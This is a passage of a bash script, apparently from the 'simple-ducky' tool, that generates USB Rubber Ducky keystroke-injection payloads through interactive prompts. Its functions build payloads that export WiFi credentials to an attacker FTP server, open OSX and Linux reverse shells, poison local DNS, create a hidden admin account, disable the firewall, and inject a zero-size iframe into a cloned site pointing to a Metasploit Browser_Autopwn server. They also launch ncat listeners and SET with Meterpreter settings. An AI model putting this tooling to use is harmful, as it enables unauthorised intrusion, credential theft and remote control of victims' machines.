		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	service pure-ftpd restart
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Acess Point Crediential Harvester w/o UAC (Win 8)
#################################################################################
f_wifunWIN8nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This script will enter the command shell as an administrator, disable the firewall and export the wifi settings. The exported settings will be sent to an ftp server of your choice."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Bucky67GTO"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/wifunWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
  	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		echo -e "\e[1;34mGenerating your payload\e[0m"
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		echo -e "\e[1;34mGenerating your payload\e[0m"
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	service pure-ftpd restart
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
#################################################################################
#
# Linux and OSX Payloads
#
#################################################################################
#################################################################################

#################################################################################
# OSX Reverse Shell
#################################################################################
f_osxrev(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell."
	echo -e "\e[1;31mNote:\e[0m Python will need to be installed for this payload to work."
	echo -e "\e[1;31mTarget:\e[0m MAC OSX (Various)"
	echo -e "\e[1;31mAuthor:\e[0m Kidovate"
	echo ""
	read -p "Launchctl autostart label? " launchlabel
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed -e "s/attackerip/$attackerip/g" -e "s/attackerport/$attackerport/g" /usr/share/simple-ducky/payloads/osxrev.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	sed -i "s/someName/$launchlabel/g" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo "To catch your shell, use: "
	echo "   ncat -l $attackerport"
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -vl $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# OSX Single User Mode Backdoor
#################################################################################
f_osxsingleuserrev(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell using OSX Single User Mode."
	echo -e "\e[1;31mUsage:\e[0m Boot into single user mode with (Command – S). At the command prompt, plug in the ducky. "
	echo -e "\e[1;31mNote:\e[0m Be sure to use duck_v2.1.hex or above (see ducky-decode link)."
	echo -e "\e[1;31mDucky-Decode Link:\e[0m https://code.google.com/p/ducky-decode/"
	echo -e "\e[1;31mPayload Support Page:\e[0m http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/"
	echo -e "\e[1;31mTarget:\e[0m MAC OSX"
	echo -e "\e[1;31mAuthor:\e[0m Patrick Mosca"
	echo ""
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/dev/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/osxsingleuserrev.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/dev/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm payload_del.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	  function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Linux Reverse Shell
#################################################################################
f_linuxrev(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload is designed to prvide a reverse shell."
	echo -e "\e[1;31mNote:\e[0m It is assumed that the victim's distro has Ncat Installed"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo ""
	echo ""
	read -p "Where shall I send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	sleep 2
	echo ""
	sed "/nc/s/ipport/$attackerip $attackerport/g" /usr/share/simple-ducky/payloads/linuxrev.conf > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	read -p "Would you like me to setup a listener [y/n]? " listener
	clear
	if [ "$listener" == "n" ]; then
		read -p "Would you like to return to the main menu [y/n]? " option
	else
		x-terminal-emulator -e ncat -lvp $attackerport &
		xdg-open /usr/share/simple-ducky/ &
		clear
		read -p "Would you like to return to the main menu [y/n]? " option
	fi


	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}


#################################################################################
#################################################################################
#
# Forced Phishing
#
#################################################################################
#################################################################################

#################################################################################
# Local DNS Poisoning | SE-Toolkit w/UAC (Win Vista/7)
#################################################################################
f_setlocaldnsVIS7uac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. Couple this attack with the SE-Toolkit's website cloner and you will be unstoppable."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept"
	echo ""
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo -e ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/setlocaldnsVIS7uac.conf > /usr/share/simple-ducky/payload_del1.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del1.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mStopping your webserver...\e[0m"
	echo ""
	sleep 2
	service apache2 stop
	clear
	echo ""
	echo -e "\e[1;34mDone!\e[0m"
	clear
	echo -e "\e[1;34mLaunching the Socail Engineering Toolkit (se-toolkit).\e[0m"
	echo ""
	sleep 2
	x-terminal-emulator -e se-toolkit &
	clear
	echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m"
	echo ""
	sleep 2
	echo ""
	echo "1) Social-Engineering Attacks"
	echo ""
	echo "2) Website Attack Vectors"
	echo ""
	echo "3) Java Applet Attack Method"
	echo ""
	echo "4) Site Cloner"
	echo ""
	echo "5) Are you using NAT/Port Forwarding [yes|no]: no"
	echo ""
	echo "6) IP address or hostname for the reverse connection: $attackerip"
	echo ""
	echo "7) Enter the url to clone: (Example: http://www.thisisafakesite.com)"
	echo ""
	echo "8) What payload do you want to generate: Windows Reverse_TCP Meterpreter"
	echo ""
	echo "9) Backdoored Executable (BEST)"
	echo ""
	echo "10) PORT of the listener [443]: $attackerport"
	echo ""
	echo ""
	read -p "Press any key to contiue" enter
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Local DNS Poisoning | SE-Toolkit w/o UAC (Win Vista/7)
#################################################################################
f_setlocaldnsVIS7nouac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. Couple this attack with the SE-Toolkit's website cloner and you will be unstoppable."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC disabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept"
	echo ""
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo -e ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/setlocaldnsVIS7nouac.conf > /usr/share/simple-ducky/payload_del1.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del1.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mStopping your webserver...\e[0m"
	echo ""
	sleep 2
	service apache2 stop
	clear
	echo ""
	echo -e "\e[1;34mDone!\e[0m"
	clear
	echo -e "\e[1;34mLaunching the Socail Engineering Toolkit (se-toolkit).\e[0m"
	echo ""
	sleep 2
	x-terminal-emulator -e se-toolkit &
	clear
	echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m"
	echo ""
	sleep 2
	echo ""
	echo "1) Social-Engineering Attacks"
	echo ""
	echo "2) Website Attack Vectors"
	echo ""
	echo "3) Java Applet Attack Method"
	echo ""
	echo "4) Site Cloner"
	echo ""
	echo "5) Are you using NAT/Port Forwarding [yes|no]: no"
	echo ""
	echo "6) IP address or hostname for the reverse connection: $attackerip"
	echo ""
	echo "7) Enter the url to clone: (Example: http://www.thisisafakesite.com)"
	echo ""
	echo "8) What payload do you want to generate: Windows Reverse_TCP Meterpreter"
	echo ""
	echo "9) Backdoored Executable (BEST)"
	echo ""
	echo "10) PORT of the listener [443]: $attackerport"
	echo ""
	echo ""
	read -p "Press any key to contiue" enter
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Local DNS Poisoning | SE-Toolkit w/o UAC (WIndows 8)
#################################################################################
f_setlocaldnsWIN8uac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. Couple this attack with the SE-Toolkit's website cloner and you will be unstoppable."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 with UAC enabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept"
	echo ""
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo -e ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/setlocaldnsWIN8uac.conf > /usr/share/simple-ducky/payload_del1.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del1.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mStopping your webserver...\e[0m"
	echo ""
	sleep 2
	service apache2 stop
	clear
	echo ""
	echo -e "\e[1;34mDone!\e[0m"
	clear
	echo -e "\e[1;34mLaunching the Socail Engineering Toolkit (se-toolkit).\e[0m"
	echo ""
	sleep 2
	x-terminal-emulator -e se-toolkit &
	clear
	echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m"
	echo ""
	sleep 2
	echo ""
	echo "1) Social-Engineering Attacks"
	echo ""
	echo "2) Website Attack Vectors"
	echo ""
	echo "3) Java Applet Attack Method"
	echo ""
	echo "4) Site Cloner"
	echo ""
	echo "5) Are you using NAT/Port Forwarding [yes|no]: no"
	echo ""
	echo "6) IP address or hostname for the reverse connection: $attackerip"
	echo ""
	echo "7) Enter the url to clone: (Example: http://www.thisisafakesite.com)"
	echo ""
	echo "8) What payload do you want to generate: Windows Reverse_TCP Meterpreter"
	echo ""
	echo "9) Backdoored Executable (BEST)"
	echo ""
	echo "10) PORT of the listener [443]: $attackerport"
	echo ""
	echo ""
	read -p "Press any key to contiue" enter
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Local DNS Poisoning | SE-Toolkit w/UAC (Windows 8)
#################################################################################
f_setlocaldnsWIN8nouac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. Couple this attack with the SE-Toolkit's website cloner and you will be unstoppable."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 with UAC disabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept"
	echo ""
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo -e ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/setlocaldnsWIN8nouac.conf > /usr/share/simple-ducky/payload_del1.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del1.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mStopping your webserver...\e[0m"
	echo ""
	sleep 2
	service apache2 stop
	clear
	echo ""
	echo -e "\e[1;34mDone!\e[0m"
	clear
	echo -e "\e[1;34mLaunching the Socail Engineering Toolkit (se-toolkit).\e[0m"
	echo ""
	sleep 2
	x-terminal-emulator -e se-toolkit &
	clear
	echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m"
	echo ""
	sleep 2
	echo ""
	echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m"
	echo ""
	sleep 2
	echo ""
	echo "1) Social-Engineering Attacks"
	echo ""
	echo "2) Website Attack Vectors"
	echo ""
	echo "3) Java Applet Attack Method"
	echo ""
	echo "4) Site Cloner"
	echo ""
	echo "5) Are you using NAT/Port Forwarding [yes|no]: no"
	echo ""
	echo "6) IP address or hostname for the reverse connection: $attackerip"
	echo ""
	echo "7) Enter the url to clone: (Example: http://www.thisisafakesite.com)"
	echo ""
	echo "8) What payload do you want to generate: Windows Reverse_TCP Meterpreter"
	echo ""
	echo "9) Backdoored Executable (BEST)"
	echo ""
	echo "10) PORT of the listener [443]: $attackerport"
	echo ""
	echo ""
	read -p "Press any key to contiue" enter
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# Local DNS Poisoning | Browser_Autopwn w/UAC (Win Vista/7)
#################################################################################
f_autopwnlocaldnsVIS7uac(){
	clear
	echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. This payload uses Metasploit's Browser_Autopwn Auxilary module along with an evil iframe to perform the attack. In addition to the DNS poisoning this attack; creates an admin account, hides the admin account, drops the firewall, enables Remote Desktop & Remote Assistance."
	echo -e "\e[1;31mNote:\e[0m Not all websites like to be cloned using this method (wget)... Browser_autopwn is a finicky method to exploit browsers. If the victim's browser and computer are fully patched this method will likely fail."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept"
	echo ""
	echo ""
	echo -e "\e[1;34mLet's start with the inject.bin file...\e[0m"
	echo ""
	read -p "What would you like the username to be for your admin account? " attackeruser
	echo ""
	read -p "What would you like the password to be for your admin account? " attackerpass
	echo ""
	read -p "What is the IP address of your attacking webserver? " attackerip
	echo ""
	read -p "What what website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain
	echo -e ""
	read -p "Where do you want me to send your shell? " attackerip
	echo ""
	read -p "What port will you be listening on? " attackerport
	echo ""
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	clear
	echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m"
	echo ""
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/autopwnlocaldnsVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt
	sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt
	sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	rm /usr/share/simple-ducky/payload_del5.txt
	rm /usr/share/simple-ducky/payload_del6.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
  	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mLet's clone a website...\e[0m"
	echo ""
	read -p "What's the FQDN that you would like to clone (example: https://www.example.com)? " attackerfqdn
	echo -e ""
	clear
	rm index.html
	clear
	rm /var/www/index.html
	clear
	echo -e "\e[1;34mCloning $attackerfqdn and injecting an evil iframe...\e[0m"
	echo ""
	sleep 2
	wget $attackerfqdn
	echo "<iframe src="http://$attackerip:8080/duck" width="0" height="0">" >> index.html
	cp index.html /var/www/index.html
	rm index.html
	clear
	echo -e "\e[1;34mRestarting your Apache Server...\e[0m"
	echo ""
	sleep 2
	service apache2 restart
	echo ""
	echo -e "\e[1;34mDone!\e[0m"
	sleep 2
	clear
	echo -e "\e[1;34mLaunching Metasploit's Browser_Autopwn auxilary module...\e[0m"
	echo ""
